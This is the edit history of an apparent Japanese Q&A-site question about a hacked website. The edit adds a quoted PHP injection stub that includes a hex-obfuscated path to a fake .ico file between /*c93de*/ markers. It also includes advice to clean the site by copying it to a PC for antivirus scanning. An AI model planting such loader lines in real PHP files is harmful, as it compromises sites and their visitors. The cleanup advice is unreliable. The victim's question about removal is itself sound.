質問編集履歴
1
調べたことを追記
test
CHANGED
|
@@ -1 +1 @@
|
|
|
1
|
-
webサイトの
|
|
1
|
+
webサイトの改ざんに関して
|
test
CHANGED
|
@@ -35,3 +35,47 @@
|
|
|
35
35
|
@include "\057home 中略 062.ico";
|
|
36
36
|
|
|
37
37
|
```
|
|
38
|
+
|
|
39
|
+
|
|
40
|
+
|
|
41
|
+
追記
|
|
42
|
+
|
|
43
|
+
|
|
44
|
+
|
|
45
|
+
ネットで調べたのは
|
|
46
|
+
|
|
47
|
+
ウェブサイト ウィルス @include
|
|
48
|
+
|
|
49
|
+
|
|
50
|
+
|
|
51
|
+
参考にしたサイト
|
|
52
|
+
|
|
53
|
+
https://its-office.jp/blog/wordpress/2017/09/14/wp-security.html
|
|
54
|
+
|
|
55
|
+
|
|
56
|
+
|
|
57
|
+
```<?php
|
|
58
|
+
|
|
59
|
+
/*c93de*/
|
|
60
|
+
|
|
61
|
+
|
|
62
|
+
|
|
63
|
+
@include "\x2f\x68\x6f\x6d\x65\x2f\x70\x61\x74\x68\x2f\x6e\x61\x6d\x65\x2f\x70\x75\x62\x6c\x69\x63\x5f\x68\x74\x6d\x6c\x2f\x64\x69\x72\x2f\x66\x61\x76\x69\x63\x6f\x6e\x5f\x63\x38\x35\x61\x33\x62\x2e\x69\x63\x6f";
|
|
64
|
+
|
|
65
|
+
|
|
66
|
+
|
|
67
|
+
/*c93de*/
|
|
68
|
+
|
|
69
|
+
|
|
70
|
+
|
|
71
|
+
echo file_get_contents('index.html.bak.bak');
|
|
72
|
+
|
|
73
|
+
index.phpを書き換えられたパターンも同じようになっています。
|
|
74
|
+
|
|
75
|
+
|
|
76
|
+
|
|
77
|
+
さて、このようになった状態だと駆除が難しいと思いますのでデータだけエクスポートして後はすべて削除して入れ直すというのが一番なのですが、削除も出来ないバックアップもとっていなくて今あるデータのみの場合はデータ丸ごとをPCに保存します。大概のPCはウィルス対策ソフト入れていると思いますのでウィルス入りのデータに反応してウィルスのみ削除してくれます。
|
|
78
|
+
|
|
79
|
+
コード
|
|
80
|
+
|
|
81
|
+
```
|